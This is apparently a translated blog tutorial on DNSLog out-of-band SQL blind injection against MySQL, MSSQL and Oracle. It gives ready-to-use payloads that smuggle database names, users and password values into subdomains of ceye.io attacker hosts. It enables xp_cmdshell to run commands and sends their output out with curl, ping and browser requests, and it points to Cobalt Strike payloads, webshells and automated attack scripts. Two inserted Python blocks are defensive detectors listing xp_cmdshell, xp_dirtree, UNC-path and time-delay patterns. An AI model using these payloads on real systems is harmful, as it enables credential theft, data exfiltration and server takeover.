Application of dnslog in SQL blind injection

0x01 The principle of DNSLog injection

As shown in the figure, the attacker submits an injection statement that makes the database concatenate the value to be extracted onto a domain name, which triggers a DNS query for that name. As long as we can read the DNS log, we obtain the value. This requires owning a domain, configuring an NS record for it at the registrar, and collecting the DNS logs on that NS server.

Free DNSLog platforms:

http://ceye.io/
http://dnslog.cn/

0x02 Scenarios where DNSLog is used

  1. Blind injection in SQL injection
  2. Command execution without echo
  3. SSRF without echo

In short: when a vulnerability gives no direct echo but the target can still initiate DNS requests, the data you want can be taken out this way.

0x03 Application in MySQL blind injection

In MySQL the load_file() function reads a file on the server and returns its content as a string. It can also be abused to send DNS requests.

Note that load_file() cannot be used for DNSLog attacks when MySQL runs on Linux.

To use this function, the following conditions must be met:

  1. The file must be on the database server and specified by absolute path.
  2. The user connected to the database must have the FILE privilege.
  3. The file content must be smaller than max_allowed_packet.

Payloads used:

?id=1' union select load_file(concat('\\\\',(select database()),'.xxxx.ceye.io\\abc'))--+
?id=1' and if((select load_file(concat('\\\\',(select database()),'.XXXXX.ceye.io\\abc'))),1,1)--+

database() is the place where the SQL query whose result you want to extract goes.

After registration, ceye.io assigns you a second-level domain. The query result is concatenated as a third-level label under that domain; once the name is resolved, the platform records it, and each recorded third-level label is the result of our SQL query. Here, for example, the third-level label will be the name of the current database. Getting the complete result in one DNS record is much faster than ordinary blind injection.

When querying table or column names, add LIMIT to restrict the output: each query corresponds to one DNS record, that is one third-level label carrying one result, so the output is limited to 1.

Below, Less-8 of sqli-labs (blind injection) is used to practise DNSLog injection:

View the current database:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1%27and%20if((select%20load_file(concat(%27\\\\%27,(select%20database()),%27.xxx.ceye.io\\abc%27))),1,1)--+

The recorded query shows that the current database is security.

To get the current user, hex-encode the result of user() with hex(user()), since a value such as root@localhost is not a valid hostname label.

Then decode the hex string recorded in the DNS log; here it decodes to root@localhost.

Later steps are similar. If load_file() returns NULL, first make sure the three conditions listed above for using this function are met.
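From the defender's side, the property that makes this work (the extracted value travels as a DNS label) is also what makes it visible in resolver logs. The following is an added example, not code from the original post: it scans simplified BIND-style query-log lines (constructed here, not real traffic) for names under a given out-of-band zone and decodes hex-encoded labels such as the hex(user()) value above and the 0x-prefixed form produced by MSSQL's fn_varbintohexstr. The zone name xxxx.ceye.io, the client addresses and the log lines are placeholders.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample of simplified BIND-style query-log lines (not real traffic).
# The labels mirror the article's examples: database name, hex(user()), and an
# MSSQL-style 0x... hex string.
SAMPLE_LOG = """\
12-Apr-2020 10:01:02.123 client 10.0.0.5#53211: query: security.xxxx.ceye.io IN A + (10.0.0.1)
12-Apr-2020 10:01:05.456 client 10.0.0.5#53212: query: 726F6F74406C6F63616C686F7374.xxxx.ceye.io IN A + (10.0.0.1)
12-Apr-2020 10:01:07.789 client 10.0.0.9#53213: query: 0x61646d696e.xxxx.ceye.io IN A + (10.0.0.1)
12-Apr-2020 10:01:09.000 client 10.0.0.7#53214: query: www.example.com IN A + (10.0.0.1)
"""

# Matches "client <ip>#<port>: query: <name> IN <type>" in a query-log line.
QUERY_RE = re.compile(r"client (?P<src>[\d.]+)#\d+: query: (?P<name>\S+) IN (?P<qtype>\S+)")
# A label made only of hex byte pairs, optionally with a 0x prefix.
HEX_RE = re.compile(r"^(0x)?([0-9a-fA-F]{2})+$")


@dataclass
class Finding:
    src: str            # resolver client that issued the query (the database host)
    qname: str          # full queried name
    label: str          # data-bearing prefix under the out-of-band zone
    encoding: str       # "hex" or "plain"
    decoded: str        # recovered value


def parse_query(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (source ip, query name, query type) or None for non-query lines."""
    m = QUERY_RE.search(line)
    if not m:
        return None
    return m.group("src"), m.group("name").rstrip("."), m.group("qtype")


def decode_label(label: str) -> Tuple[str, str]:
    """Decode a data-bearing label: hex (MySQL hex(), MSSQL 0x...) or plain text."""
    if HEX_RE.match(label):
        raw = label[2:] if label[:2].lower() == "0x" else label
        try:
            text = bytes.fromhex(raw).decode("utf-8")
            if text.isprintable():
                return "hex", text
        except ValueError:  # bad hex or non-UTF-8 bytes: treat as plain text
            pass
    return "plain", label


def find_exfil(log_text: str, oob_zone: str) -> List[Finding]:
    """Flag every query for a name under oob_zone and recover the carried value."""
    suffix = "." + oob_zone.lower().strip(".")
    findings: List[Finding] = []
    for line in log_text.splitlines():
        parsed = parse_query(line)
        if parsed is None:
            continue
        src, qname, _qtype = parsed
        if not qname.lower().endswith(suffix):
            continue
        prefix = qname[: -len(suffix)]
        if not prefix:
            continue  # bare zone name, nothing carried
        encoding, value = decode_label(prefix)
        findings.append(Finding(src, qname, prefix, encoding, value))
    return findings


if __name__ == "__main__":
    for f in find_exfil(SAMPLE_LOG, "xxxx.ceye.io"):
        print(f"{f.src} resolved {f.qname}: {f.encoding} label -> {f.decoded!r}")
```

In practice the zone to watch for is whatever the resolver sees a database server asking about that is not a known dependency; a database host resolving names under a zone it has no business with is itself the alert, and the decoded labels tell the responder what has already been read.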

0x04 Application in MSSQL

This requires stacked injection (several SQL statements executed one after another in one request). PoC (库名 stands for the database name):

http://127.0.0.1/mssql.php?id=1;
DECLARE @host varchar(1024);SELECT @host=(SELECT master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass))) 
FROM 库名.dbo.test_user where [USER] = 'admin')%2b'.nk40ci.ceye.io';
EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"');

Test whether stacked queries work (the response is delayed by 5 seconds if they do): ?id=1';WAITFOR DELAY '0:0:5'--

Get the current user:

id=2';declare @a char(128);set @a='\\'%2buser%2b'.***.ceye.io\abc';exec master..xp_dirtree @a;--

Get the database name:

id=2';declare @a char(128);set @a='\\'%2b(select top 1 name from master.dbo.sysdatabases)%2b'.***.ceye.io\abc';exec master..xp_dirtree @a;--

The rest can be dumped with sqlmap. If the connection has sa privileges, the xp_cmdshell component can be enabled to execute commands.

Enable xp_cmdshell:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;

SQL statement that executes a command:

id=2';exec master..xp_cmdshell 'whoami'--

Here the command runs without any echo: its output is not returned in the response.

With DNSLog, the command output can be returned to the platform via the following statement; then check the platform's HTTP log:

?id=1';exec master..xp_cmdshell "for /F %s in ('whoami') do start http://xxx.ceye.io/?%s"--

The output of whoami ends up as the last query-string parameter of the recorded HTTP request URL, the parameter name being the command output.

Because this statement opens the local default browser, you need to close that browser afterwards; if the default browser is not IE, find its process name with tasklist:

?id=123';exec master..xp_cmdshell "taskkill /f /im iexplore.exe"--
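The stacked-query probe, the xp_dirtree UNC trick and the xp_cmdshell steps in this section all leave distinctive fingerprints in the statement text that reaches the database. The following is an added example, not code from the original post: it inspects decoded SQL text (constructed samples modelled on the PoCs above, with the article's placeholder ***.ceye.io, and shown as the full statement the application would build) for stacked statements, WAITFOR DELAY, xp_dirtree/xp_fileexist/xp_subdirs, UNC string literals, and xp_cmdshell use or enabling, as a WAF rule set or a SQL Server audit consumer would.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed samples of statements as the application would send them after the
# injected values from this section are URL-decoded (%2b -> +, %27 -> ').
SAMPLE_QUERIES = [
    r"SELECT * FROM news WHERE id='1'",
    r"SELECT * FROM news WHERE id='1';WAITFOR DELAY '0:0:5'--'",
    r"SELECT * FROM news WHERE id='2';declare @a char(128);set @a='\\'+user+'.***.ceye.io\abc';exec master..xp_dirtree @a;--'",
    r"SELECT * FROM news WHERE id='2';exec master..xp_cmdshell 'whoami'--'",
    r"EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;",
]

# (rule name, pattern, severity); names are this example's own labels.
RULES = [
    ("stacked_time_delay", re.compile(r"\bWAITFOR\s+DELAY\b", re.I), "medium"),
    ("xp_cmdshell_enable", re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I), "high"),
    ("xp_cmdshell_exec", re.compile(r"\bexec(?:ute)?\s+(?:master\.\.)?xp_cmdshell\b", re.I), "high"),
    ("unc_path_probe", re.compile(r"\bxp_(?:dirtree|fileexist|subdirs)\b", re.I), "high"),
    ("unc_string_literal", re.compile(r"'\\\\"), "high"),   # a literal starting with \\
]
SEVERITY_RANK = {"none": 0, "medium": 1, "high": 2}


@dataclass
class Finding:
    sql: str
    statements: int
    rules: List[str] = field(default_factory=list)
    severity: str = "none"


def split_statements(sql: str) -> List[str]:
    """Split on ';' outside single-quoted literals; stop at a '--' line comment."""
    stmts, buf, in_quote, i = [], [], False, 0
    while i < len(sql):
        ch = sql[i]
        if in_quote:
            buf.append(ch)
            if ch == "'":
                if i + 1 < len(sql) and sql[i + 1] == "'":   # doubled quote inside literal
                    buf.append("'")
                    i += 1
                else:
                    in_quote = False
        elif ch == "'":
            in_quote = True
            buf.append(ch)
        elif sql.startswith("--", i):
            break                                            # rest of line is a comment
        elif ch == ";":
            stmts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
        i += 1
    stmts.append("".join(buf))
    return [s.strip() for s in stmts if s.strip()]


def analyze(sql: str) -> Finding:
    """Apply the rules and flag stacked statements; severity is the highest rule hit."""
    stmts = split_statements(sql)
    finding = Finding(sql=sql, statements=len(stmts))
    worst = "none"
    for name, pattern, sev in RULES:
        if pattern.search(sql):
            finding.rules.append(name)
            if SEVERITY_RANK[sev] > SEVERITY_RANK[worst]:
                worst = sev
    if len(stmts) > 1:
        finding.rules.append("stacked_queries")
        if SEVERITY_RANK["medium"] > SEVERITY_RANK[worst]:
            worst = "medium"
    finding.severity = worst
    return finding


if __name__ == "__main__":
    for f in map(analyze, SAMPLE_QUERIES):
        print(f"[{f.severity:6}] {f.statements} stmt(s) {f.rules}: {f.sql[:60]}")
```

Statement splitting is what separates a legitimate single query from a stacked one, which is why the splitter respects quoted literals rather than counting semicolons blindly; the xp_* and UNC rules cover the exfiltration step even when the time-delay probe was never sent.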

In practice you do not actually need to see the command output: as long as commands execute and the host can reach the Internet, a Cobalt Strike payload can be downloaded and run to get a session directly, or a webshell written if the absolute web path is known.

For a Linux server:

curl http://`whoami`.xxx.ceye.io/    then check the HTTP record on the platform
ping -c 1 `whoami`.xxx.ceye.io       then check the DNS record on the platform

When several results are needed, such as the output of ls:
for i in $(ls /); do curl "http://$i.xxx.ceye.io/"; done;

Automated command execution tool: https://github.com/quyunjie/Red-Team/blob/master/mssql-rce/mandros.py

0x05 Oracle

SELECT UTL_INADDR.GET_HOST_ADDRESS('b182oj.ceye.io');
SELECT UTL_HTTP.REQUEST('http://b182oj.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT('oracle.b182oj.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.b182oj.ceye.io',80) FROM DUAL;


Reference link: https://www.anquanke.com/post/id/98096#h3-5

Script for automating injection with DNSLog: https://github.com/ADOOO/DnslogSqlinj


Source: www.cnblogs.com/-chenxs/p/12691437.html